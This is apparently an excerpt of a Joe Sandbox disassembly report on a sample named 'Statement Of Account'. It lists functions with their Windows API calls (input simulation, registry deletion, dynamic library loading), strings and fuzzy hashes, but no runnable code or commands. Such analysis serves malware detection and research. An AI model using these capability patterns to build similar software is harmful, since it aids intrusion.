HH, xrefs: 00475B3A
.lnk, xrefs: 00475B16, 00475B29

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk$HH
API String ID: 886957087-3121654589
Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99

Function 0045F132 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045F1A0
GetMenuItemInfoW.USER32 ref: 0045F1B9
DeleteMenu.USER32(?,?,00000000), ref: 0045F218
DeleteMenu.USER32(?,?,00000000), ref: 0045F27A

Strings

0, xrefs: 0045F198

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6

Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

Strings

ComboBox, xrefs: 004692EF
ListBox, xrefs: 00469323

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID: ComboBox$ListBox
API String ID: 763830540-1403004172
Opcode ID: 169cb05da2f7371639be8c7bcea77e944b24e4bfad061a6cd0ac94a92c737455
Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
Opcode Fuzzy Hash: 169cb05da2f7371639be8c7bcea77e944b24e4bfad061a6cd0ac94a92c737455
Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E

Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?), ref: 004439B4

Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4

Strings

nul, xrefs: 00443A2D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CurrentHandleProcess$Duplicate
String ID: nul
API String ID: 2124370227-2873401336
Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6

Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 004438B7

Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4

Strings

nul, xrefs: 00443931

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CurrentHandleProcess$Duplicate
String ID: nul
API String ID: 2124370227-2873401336
Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56

Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
TranslateMessage.USER32(?), ref: 0044308B
DispatchMessageW.USER32(?), ref: 00443096
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD

Strings

*.*, xrefs: 00443036

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID: *.*
API String ID: 1795658109-438819550
Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E

Function 0040F790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F7F9
_memset.LIBCMT ref: 0040F803
_memset.LIBCMT ref: 0040F810
_sprintf.LIBCMT ref: 0040F82F

Strings

%02X, xrefs: 0040F829

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _memset$_sprintf
String ID: %02X
API String ID: 891462717-436463671
Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E

Function 0047B1D0 Relevance: 8.0, APIs: 5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA

Function 004498BD Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA

Function 00463D7E Relevance: 7.6, APIs: 5, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
GetProcAddress.KERNEL32(?,?), ref: 00463E68
GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
GetProcAddress.KERNEL32(?,?), ref: 00463ECE
FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID:
API String ID: 2449869053-0
Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA

Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
SetKeyboardState.USER32(00000080), ref: 0044C3ED
PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
SendInput.USER32 ref: 0044C509

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: KeyboardMessagePostState$InputSend
String ID:
API String ID: 3031425849-0
Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A

Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32 ref: 004422F0
RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
RegCloseKey.ADVAPI32(00000000), ref: 0044234E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Enum$CloseDeleteOpen
String ID:
API String ID: 2095303065-0
Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A

Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94

Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00447C1B
ScreenToClient.USER32(?,?), ref: 00447C39
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
EndPaint.USER32(?,?), ref: 00447CD1

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ClientPaintRectRectangleScreenViewportWindow
String ID:
API String ID: 659298297-0
Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69

Function 00438EAD Relevance: 7.6, APIs: 5, Instructions: 90sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00438ECC
PostMessageW.USER32(00000001,?,00000001,?), ref: 00438F7C
Sleep.KERNEL32(00000000), ref: 00438F84
PostMessageW.USER32(?,00000202,00000000,?), ref: 00438F95
Sleep.KERNEL32(00000000,?,00000202,00000000,?), ref: 00438F9D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 2ab6e8217c4101ef9f031d568675ad0bf41e28325206932565347c4090b4e9a4
Instruction ID: 0163f4fbfa3540aa74b75641586733f0f0ecdd6424bf32d6baecdffd05b1cde8
Opcode Fuzzy Hash: 2ab6e8217c4101ef9f031d568675ad0bf41e28325206932565347c4090b4e9a4
Instruction Fuzzy Hash: 9B31C032104305AFD300CF68CA88A6BB7E5EBC8314F555A2DF9A497291DB74EC06CB56

Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
EnableWindow.USER32(004A83D8,00000001), ref: 00448C58

Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
Part of subcall function 004413F0: SendMessageW.USER32(00A11BE8,000000F1,00000000,00000000), ref: 004414C6
Part of subcall function 004413F0: SendMessageW.USER32(00A11BE8,000000F1,00000001,00000000), ref: 004414F1

Memory Dump Source

